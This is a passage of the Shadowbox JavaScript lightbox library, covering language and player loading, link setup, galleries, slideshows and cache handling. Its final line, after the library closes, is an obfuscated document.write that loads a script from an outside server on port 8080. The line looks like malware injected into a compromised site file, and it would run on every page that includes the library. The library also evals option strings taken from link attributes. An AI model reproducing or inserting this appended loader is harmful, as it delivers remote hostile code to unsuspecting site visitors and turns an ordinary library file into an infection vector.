page via the appropriate * <script> tag, this function does not need to be called. Otherwise, this * function must be called before window.onload. * * @param String lang The language abbreviation (e.g. en) * @param String dir The directory where the Shadowbox * language file(s) is located * @return void * @public * @static */ Shadowbox.loadLanguage = function(lang, dir){ if(!(/\/$/.test(dir))) dir += '/'; // Safari 2.0 fails using DOM, use document.write instead document.write('<scr' + 'ipt type="text/javascript" src="' + dir + 'shadowbox-' + lang + '.js"><\/script>'); }; /** * Dynamically loads the specified player(s) to be used with Shadowbox. If * the needed player(s) is already included in the page via the appropriate * <script> tag(s), this function does not need to be called. Otherwise, * this function must be called before window.onload. * * @param Array players The player(s) to load * @param String dir The director where the Shadowbox player * file(s) is located * @return void * @public * @static */ Shadowbox.loadPlayer = function(players, dir){ if(typeof players == 'string') players = [players]; if(!(/\/$/.test(dir))) dir += '/'; for(var i = 0, len = players.length; i < len; ++i){ // Safari 2.0 fails using DOM, use document.write instead document.write('<scr' + 'ipt type="text/javascript" src="' + dir + 'shadowbox-' + players[i] + '.js"><\/script>'); } }; /** * Sets up listeners on the given links that will trigger Shadowbox. If no * links are given, this method will set up every anchor element on the page * with the appropriate rel attribute. Note: Because AREA elements do not * support the rel attribute, they must be explicitly passed to this method. * * @param Array links An array (or array-like) list of anchor * and/or area elements to set up * @param Object opts Some options to use for the given links * @return void * @public * @static */ Shadowbox.setup = function(links, opts){ // get links if none specified if(!links){ var links = []; var a = document.getElementsByTagName('a'), rel; for(var i = 0, len = a.length; i < len; ++i){ rel = a[i].getAttribute('rel'); if(rel && RE.rel.test(rel)) links[links.length] = a[i]; } }else if(!links.length){ links = [links]; // one link } var link; for(var i = 0, len = links.length; i < len; ++i){ link = links[i]; if(typeof link.shadowboxCacheKey == 'undefined'){ // assign cache key expando // use integer primitive to avoid memory leak in IE link.shadowboxCacheKey = cache.length; SL.addEvent(link, 'click', handleClick); // add listener } cache[link.shadowboxCacheKey] = this.buildCacheObj(link, opts); } }; /** * Builds an object from the original link element data to store in cache. * These objects contain (most of) the following keys: * * - el: the link element * - title: the linked file title * - player: the player to use for the linked file * - content: the linked file's URL * - gallery: the gallery the file belongs to (optional) * - height: the height of the linked file (only necessary for movies) * - width: the width of the linked file (only necessary for movies) * - options: custom options to use (optional) * * @param HTMLElement link The link element to process * @return Object An object representing the link * @public * @static */ Shadowbox.buildCacheObj = function(link, opts){ var href = link.href; // don't use getAttribute() here var o = { el: link, title: link.getAttribute('title'), player: getPlayer(href), options: apply({}, opts || {}), // break the reference content: href }; // remove link-level options from top-level options var opt, l_opts = ['player', 'title', 'height', 'width', 'gallery']; for(var i = 0, len = l_opts.length; i < len; ++i){ opt = l_opts[i]; if(typeof o.options[opt] != 'undefined'){ o[opt] = o.options[opt]; delete o.options[opt]; } } // HTML options always trump JavaScript options, so do these last var rel = link.getAttribute('rel'); if(rel){ // extract gallery name from shadowbox[name] format var match = rel.match(RE.gallery); if(match) o.gallery = escape(match[2]); // other parameters var params = rel.split(';'); for(var i = 0, len = params.length; i < len; ++i){ match = params[i].match(RE.param); if(match){ if(match[1] == 'options'){ eval('apply(o.options, ' + match[2] + ')'); }else{ o[match[1]] = match[2]; } } } } return o; }; /** * Applies the given set of options to those currently in use. Note: Options * will be reset on Shadowbox.open() so this function is only useful after * it has already been called (while Shadowbox is open). * * @param Object opts The options to apply * @return void * @public * @static */ Shadowbox.applyOptions = function(opts){ if(opts){ // use apply here to break references default_options = apply({}, options); // store default options options = apply(options, opts); // apply options } }; /** * Reverts Shadowbox' options to the last default set in use before * Shadowbox.applyOptions() was called. * * @return void * @public * @static */ Shadowbox.revertOptions = function(){ if(default_options){ options = default_options; // revert to default options default_options = null; // erase for next time } }; /** * Opens the given object in Shadowbox. This object may be either an * anchor/area element, or an object similar to the one created by * Shadowbox.buildCacheObj(). * * @param mixed obj The object or link element that defines * what to display * @return void * @public * @static */ Shadowbox.open = function(obj, opts){ // revert options this.revertOptions(); // is it a link? if(isLink(obj)){ if(typeof obj.shadowboxCacheKey == 'undefined' || typeof cache[obj.shadowboxCacheKey] == 'undefined'){ // link element that hasn't been set up before // create on-the-fly object obj = this.buildCacheObj(obj, opts); }else{ // link element that has been set up before, get from cache obj = cache[obj.shadowboxCacheKey]; } } // is it already a gallery? if(obj.constructor == Array){ gallery = obj; current = 0; }else{ // create a copy so it doesn't get modified later var copy = apply({}, obj); // is it part of a gallery? if(!obj.gallery){ // single item, no gallery gallery = [copy]; current = 0; }else{ current = null; // reset current gallery = []; // clear the current gallery var ci; for(var i = 0, len = cache.length; i < len; ++i){ ci = cache[i]; if(ci.gallery){ if(ci.content == obj.content && ci.gallery == obj.gallery && ci.title == obj.title){ // compare content, gallery, & title current = gallery.length; // key element found } if(ci.gallery == obj.gallery){ gallery.push(apply({}, ci)); } } } // if not found in cache, prepend to front of gallery if(current == null){ gallery.unshift(copy); current = 0; } } } obj = gallery[current]; // apply custom options if(obj.options || opts){ // use apply here to break references this.applyOptions(apply(apply({}, obj.options || {}), opts || {})); } // filter gallery for unsupported elements var match, r; for(var i = 0, len = gallery.length; i < len; ++i){ r = false; // remove the element? if(gallery[i].player == 'unsupported'){ // don't support this at all r = true; }else if(match = RE.unsupported.exec(gallery[i].player)){ // handle unsupported elements if(options.handleUnsupported == 'link'){ gallery[i].player = 'html'; // generate a link to the appropriate plugin download page(s) var s, a, oe = options.errors; switch(match[1]){ case 'qtwmp': s = 'either'; a = [oe.qt.url, oe.qt.name, oe.wmp.url, oe.wmp.name]; break; case 'qtf4m': s = 'shared'; a = [oe.qt.url, oe.qt.name, oe.f4m.url, oe.f4m.name]; break; default: s = 'single'; if(match[1] == 'swf' || match[1] == 'flv') match[1] = 'fla'; a = [oe[match[1]].url, oe[match[1]].name]; } var msg = SB.LANG.errors[s].replace(/\{(\d+)\}/g, function(m, i){ return a[i]; }); gallery[i].content = '<div class="shadowbox_message">' + msg + '</div>'; }else{ r = true; } }else if(gallery[i].player == 'inline'){ // handle inline elements // retrieve the innerHTML of the inline element var match = RE.inline.exec(gallery[i].content); if(match){ var el; if(el = SL.get(match[1])){ gallery[i].content = el.innerHTML; }else{ SB.raise('Cannot find element with id ' + match[1]); } }else{ SB.raise('Cannot find element id for inline content'); } } if(r){ gallery.splice(i, 1); // remove the element from the gallery if(i < current){ --current; }else if(i == current){ // if current is unsupported, look for supported neighbor current = i > 0 ? current - 1 : i; } --i; // decrement to account for splice len = gallery.length; // gallery.length has changed! } } // anything left? if(gallery.length){ // fire onOpen hook if(options.onOpen && typeof options.onOpen == 'function'){ options.onOpen(obj); } if(!activated){ // set initial dimensions & load setDimensions(options.initialHeight, options.initialWidth); adjustHeight(dims.inner_h, dims.top, false); adjustWidth(dims.width, false); toggleVisible(loadContent); } else { loadContent(); } activated = true; } }; /** * Jumps to the piece in the current gallery with index num. * * @param Number num The gallery index to view * @return void * @public * @static */ Shadowbox.change = function(num){ if(!gallery) return; // no current gallery if(!gallery[num]){ // index does not exist if(!options.continuous){ return; }else{ num = num < 0 ? (gallery.length - 1) : 0; // loop } } if(typeof slide_timer == 'number'){ clearTimeout(slide_timer); slide_timer = null; slide_delay = slide_start = 0; // reset slideshow variables } current = num; // update current if(options.onChange && typeof options.onChange == 'function'){ options.onChange(gallery[current]); // fire onChange handler } loadContent(); }; /** * Jumps to the next piece in the gallery. * * @return void * @public * @static */ Shadowbox.next = function(){ this.change(current + 1); }; /** * Jumps to the previous piece in the gallery. * * @return void * @public * @static */ Shadowbox.previous = function(){ this.change(current - 1); }; /** * Sets the timer for the next image in the slideshow to be displayed. * * @return void * @public * @static */ Shadowbox.play = function(){ if(!hasNext()) return; if(!slide_delay) slide_delay = options.slideshowDelay * 1000; if(slide_delay){ slide_start = new Date().getTime(); slide_timer = setTimeout(function(){ slide_delay = slide_start = 0; // reset slideshow SB.next(); }, slide_delay); // change play nav to pause toggleNav('play', false); toggleNav('pause', true); } }; /** * Pauses the current slideshow. * * @return void * @public * @static */ Shadowbox.pause = function(){ if(typeof slide_timer == 'number'){ var time = new Date().getTime(); slide_delay = Math.max(0, slide_delay - (time - slide_start)); // any delay left on current slide? if so, stop the timer if(slide_delay){ clearTimeout(slide_timer); slide_timer = 'paused'; } // change pause nav to play toggleNav('pause', false); toggleNav('play', true); } }; /** * Deactivates Shadowbox. * * @return void * @public * @static */ Shadowbox.close = function(){ if(!activated) return; // already closed // stop listening for keys listenKeys(false); // hide toggleVisible(false); // remove the content if(content){ content.remove(); content = null; } // clear slideshow variables if(typeof slide_timer == 'number') clearTimeout(slide_timer); slide_timer = null; slide_delay = 0; // fire onClose handler if(options.onClose && typeof options.onClose == 'function'){ options.onClose(gallery[current]); } activated = false; }; /** * Clears Shadowbox' cache and removes listeners and expandos from all * cached link elements. May be used to completely reset Shadowbox in case * links on a page change. * * @return void * @public * @static */ Shadowbox.clearCache = function(){ for(var i = 0, len = cache.length; i < len; ++i){ if(cache[i].el){ SL.removeEvent(cache[i].el, 'click', handleClick); delete cache[i].el.shadowboxCacheKey; // remove expando } } cache = []; }; /** * Gets an object that lists which plugins are supported by the client. The * keys of this object will be: * * - fla: Adobe Flash Player * - qt: QuickTime Player * - wmp: Windows Media Player * - f4m: Flip4Mac QuickTime Player * * @return Object The plugins object * @public * @static */ Shadowbox.getPlugins = function(){ return plugins; }; /** * Gets the current options object in use. * * @return Object The options object * @public * @static */ Shadowbox.getOptions = function(){ return options; }; /** * Gets the current gallery object. * * @return Object The current gallery item * @public * @static */ Shadowbox.getCurrent = function(){ return gallery[current]; }; /** * Gets the current version number of Shadowbox. * * @return String The current version * @public * @static */ Shadowbox.getVersion = function(){ return version; }; /** * Returns an object containing information about the current client * configuration. * * @return Object The object containing client data * @public * @static */ Shadowbox.getClient = function(){ return client; }; /** * Returns the current content object in use. * * @return Object The current content object * @public * @static */ Shadowbox.getContent = function(){ return content; }; /** * Gets the current dimensions of Shadowbox as calculated by * setDimensions(). * * @return Object The current dimensions of Shadowbox * @public * @static */ Shadowbox.getDimensions = function(){ return dims; }; /** * Handles all Shadowbox exceptions (errors). Calls the exception * handler callback if one is present (see handleException option) or * throws a new exception. * * @param String e The error message * @return void * @public * @static */ Shadowbox.raise = function(e){ if(typeof options.handleException == 'function'){ options.handleException(e); }else{ throw e; } }; })(); document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/XHTML.js"></scr'+'ipt>');